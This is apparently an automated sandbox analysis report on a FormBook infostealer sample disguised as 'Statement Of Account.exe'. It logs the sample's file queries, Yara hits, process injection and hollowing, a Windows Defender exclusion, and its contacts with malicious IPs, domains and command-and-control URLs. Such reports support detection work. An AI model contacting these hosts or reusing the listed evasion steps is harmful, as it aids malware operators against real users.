Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Users\user\AppData\Roaming\SdYCcXyq.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Roaming\SdYCcXyq.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\Statement Of Account.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected FormBook
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 14.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000F.00000002.2937327062.00000000027B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938280316.0000000004640000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004129000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.1776996971.0000000002C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1704225673.0000000004969000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1742872490.00000000047D8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.1770021139.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.2938172951.0000000004610000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430501 Sample: Statement Of Account.exe Startdate: 23/04/2024 Architecture: WINDOWS Score: 100 57 www.zdryueva.com 2->57 59 www.bodution.website 2->59 61 4 other IPs or domains 2->61 79 Snort IDS alert for network traffic 2->79 81 Found malware configuration 2->81 83 Malicious sample detected (through community Yara rule) 2->83 85 14 other signatures 2->85 11 Statement Of Account.exe 7 2->11         started        15 SdYCcXyq.exe 5 2->15         started        signatures3 process4 file5 53 C:\Users\user\AppData\Roaming\SdYCcXyq.exe, PE32 11->53 dropped 55 C:\Users\user\AppData\Local\...\tmp9A8F.tmp, XML 11->55 dropped 87 Writes to foreign memory regions 11->87 89 Allocates memory in foreign processes 11->89 91 Adds a directory exclusion to Windows Defender 11->91 17 RegSvcs.exe 11->17         started        20 powershell.exe 23 11->20         started        22 powershell.exe 23 11->22         started        24 schtasks.exe 1 11->24         started        93 Multi AV Scanner detection for dropped file 15->93 95 Machine Learning detection for dropped file 15->95 97 Injects a PE file into a foreign processes 15->97 26 RegSvcs.exe 15->26         started        28 schtasks.exe 15->28         started        signatures6 process7 signatures8 69 Modifies the context of a thread in another process (thread injection) 17->69 71 Maps a DLL or memory area into another process 17->71 73 Sample uses process hollowing technique 17->73 77 2 other signatures 17->77 30 explorer.exe 32 1 17->30 injected 75 Loading BitLocker PowerShell Module 20->75 34 WmiPrvSE.exe 20->34         started        36 conhost.exe 20->36         started        38 conhost.exe 22->38         started        40 conhost.exe 24->40         started        42 conhost.exe 28->42         started        process9 dnsIp10 63 www.airzf.com 154.12.38.29, 49748, 80 UNMETEREDCA United States 30->63 65 www.b-a-s-e.net 91.195.240.94, 49750, 80 SEDO-ASDE Germany 30->65 67 td-ccm-neg-87-45.wixdns.net 34.149.87.45, 49751, 80 ATGS-MMD-ASUS United States 30->67 105 System process connects to network (likely due to code injection or exploit) 30->105 44 cmstp.exe 30->44         started        47 colorcpl.exe 30->47         started        signatures11 process12 signatures13 99 Modifies the context of a thread in another process (thread injection) 44->99 101 Maps a DLL or memory area into another process 44->101 103 Tries to detect virtualization through RDTSC time measurements 44->103 49 cmd.exe 44->49         started        process14 process15 51 conhost.exe 49->51         started       
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
91.195.240.94
 www.b-a-s-e.net Germany
47846 SEDO-ASDE true
154.12.38.29
 www.airzf.com United States
54133 UNMETEREDCA true
34.149.87.45
 td-ccm-neg-87-45.wixdns.net United States
2686 ATGS-MMD-ASUS true

Contacted Domains

Name IP Active
www.airzf.com 154.12.38.29 true
www.b-a-s-e.net 91.195.240.94 true
www.bodution.website 160.124.174.163 true
td-ccm-neg-87-45.wixdns.net 34.149.87.45 true
www.zdryueva.com unknown unknown

Contacted URLs

Name Malicious Antivirus Detection Reputation
http://www.airzf.com/gs12/?r6-=DR9+51rACou4eQBXOdoZ4W0ewB14phJf97sbOZAiDLbqJph64OQ6FfPwpwURv63eY6pg&YN=9rKtZn5 true
  • Avira URL Cloud: safe
 unknown
http://www.b-a-s-e.net/gs12/?r6-=QIIWKxrtyX7LT6NTTkxUIHQxUymhf5FB+GXjykqQ4dPV8mdQoaOANT6/8pJ3wvHey5SR&YN=9rKtZn5 true
  • Avira URL Cloud: safe
 unknown